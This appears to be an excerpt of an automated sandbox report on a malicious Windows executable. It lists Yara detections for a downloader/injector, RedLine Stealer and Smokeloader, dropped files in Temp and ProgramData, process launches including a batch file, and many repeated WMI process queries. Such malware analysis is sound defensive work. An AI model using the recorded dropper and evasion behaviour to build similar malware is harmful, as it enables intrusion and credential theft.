                        Source: Yara matchFile source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 25C1.exe, type: SAMPLEMatched rule: Detects downloader / injector Author: ditekSHen
                        Source: 0.0.25C1.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                        Source: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000020.00000002.1591528645.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeCode function: 4_2_00007FF69A531394 NtAlpcOpenSenderThread,4_2_00007FF69A531394
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeCode function: 27_2_00007FF7EE4A1394 NtSetDefaultUILanguage,27_2_00007FF7EE4A1394
                        Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000000140001394 NtCloseObjectAuditAlarm,37_2_0000000140001394
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403532
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeFile created: C:\Windows\TEMP\gbfbijmbpkdw.sys
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_rta0son3.13e.ps1
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00406DC63_2_00406DC6
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_0040759D3_2_0040759D
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeCode function: 4_2_00007FF69A533B504_2_00007FF69A533B50
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeCode function: 27_2_00007FF7EE4A3B5027_2_00007FF7EE4A3B50
                        Source: C:\Windows\System32\conhost.exeCode function: 37_2_000000014000315037_2_0000000140003150
                        Source: C:\Windows\System32\conhost.exeCode function: 37_2_00000001400026E037_2_00000001400026E0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 41_2_0098BEB041_2_0098BEB0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 41_2_0098BEA141_2_0098BEA1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 41_2_07F43EA841_2_07F43EA8
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe 5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe B7A6DCFDD64173ECBCEF562FD74AEE07F3639FA863BD5740C7E72DDC0592B4FC
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeCode function: String function: 00007FF7EE4A1394 appears 33 times
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeCode function: String function: 00007FF69A531394 appears 33 times
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692
                        Source: BroomSetup.exe.3.drStatic PE information: Number of sections : 11 > 10
                        Source: 25C1.exe, 00000000.00000000.1354675973.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename288c47bbc1871b439df19ff4df68f0776.exe4 vs 25C1.exe
                        Source: 25C1.exe, 00000000.00000002.1371770531.00000000012BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 25C1.exe
                        Source: 25C1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 25C1.exe, type: SAMPLEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                        Source: 0.0.25C1.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                        Source: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000020.00000002.1591528645.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@67/30@3/7
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403532
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_004049C7
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 2_2_028307C6 CreateToolhelp32Snapshot,Module32First,2_2_028307C6
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_004021AF CoCreateInstance,3_2_004021AF
                        Source: C:\Users\user\Desktop\25C1.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\25C1.exe.logJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6404:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7976:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3656:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:764:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7964:64:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                        Source: C:\Users\user\Desktop\25C1.exeFile created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJump to behavior
                        Source: Yara matchFile source: 5.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000000.1369842650.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCommand line argument: E~|x32_1_00401454
                        Source: 25C1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: 25C1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
